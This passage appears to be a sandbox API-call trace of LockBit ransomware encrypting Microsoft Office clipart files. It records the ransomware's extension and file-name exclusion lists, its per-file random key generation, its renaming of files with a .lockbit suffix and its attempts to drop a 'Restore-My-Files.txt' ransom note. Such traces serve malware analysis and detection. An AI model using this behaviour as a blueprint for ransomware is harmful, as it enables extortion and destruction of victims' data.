(lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.149] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.149] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.149] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.149] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00943_.WMF.lockbit") returned 72 [0176.149] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00943_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00943_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0176.150] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.150] malloc (_Size=0x40068) returned 0x3f70048 [0176.150] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=7556) returned 1 [0176.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0176.151] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.151] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0176.151] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0176.165] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00943_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00943_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.166] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.166] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.167] free (_Block=0x1fa2ed8) [0176.167] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00943_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.167] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.168] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.168] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5505900, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa5505900, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0xae1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01044_.WMF", cAlternateFileName="")) returned 1 [0176.168] lstrcmpiW (lpString1=".", lpString2="SO01044_.WMF") returned -1 [0176.168] lstrcmpiW (lpString1="..", lpString2="SO01044_.WMF") returned -1 [0176.168] PathFindExtensionW (pszPath="SO01044_.WMF") returned=".WMF" [0176.168] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.168] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.169] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.169] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01044_.WMF") returned -1 [0176.170] lstrcmpiW (lpString1="ntldr", lpString2="SO01044_.WMF") returned -1 [0176.170] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01044_.WMF") returned -1 [0176.170] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01044_.WMF") returned -1 [0176.170] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01044_.WMF") returned -1 [0176.170] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01044_.WMF") returned 1 [0176.170] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01044_.WMF") returned -1 [0176.170] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.170] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF") returned=".WMF" [0176.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.170] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.170] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.171] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.172] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.172] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF.lockbit") returned 72 [0176.172] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01044_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0176.173] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.173] malloc (_Size=0x40068) returned 0x3df0008 [0176.173] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=44570) returned 1 [0176.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0176.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0176.174] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0176.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.184] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.185] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.186] free (_Block=0x1fa2ed8) [0176.186] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.186] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.186] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.186] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98336a00, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x6d358650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98336a00, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x5b38, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01063_.WMF", cAlternateFileName="")) returned 1 [0176.186] lstrcmpiW (lpString1=".", lpString2="SO01063_.WMF") returned -1 [0176.186] lstrcmpiW (lpString1="..", lpString2="SO01063_.WMF") returned -1 [0176.187] PathFindExtensionW (pszPath="SO01063_.WMF") returned=".WMF" [0176.187] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.187] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.188] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.188] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01063_.WMF") returned -1 [0176.189] lstrcmpiW (lpString1="ntldr", lpString2="SO01063_.WMF") returned -1 [0176.189] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01063_.WMF") returned -1 [0176.189] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01063_.WMF") returned -1 [0176.189] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01063_.WMF") returned -1 [0176.189] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01063_.WMF") returned 1 [0176.189] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01063_.WMF") returned -1 [0176.189] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.189] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF") returned=".WMF" [0176.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.189] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.189] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.190] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.190] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF.lockbit") returned 72 [0176.190] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01063_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0176.192] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.192] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.192] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=23352) returned 1 [0176.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.194] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.194] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.207] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.207] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.207] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.209] free (_Block=0x1fa2ed8) [0176.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.209] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.209] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1075e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01236_.WMF", cAlternateFileName="")) returned 1 [0176.209] lstrcmpiW (lpString1=".", lpString2="SO01236_.WMF") returned -1 [0176.209] lstrcmpiW (lpString1="..", lpString2="SO01236_.WMF") returned -1 [0176.209] PathFindExtensionW (pszPath="SO01236_.WMF") returned=".WMF" [0176.209] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.210] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.211] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.211] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 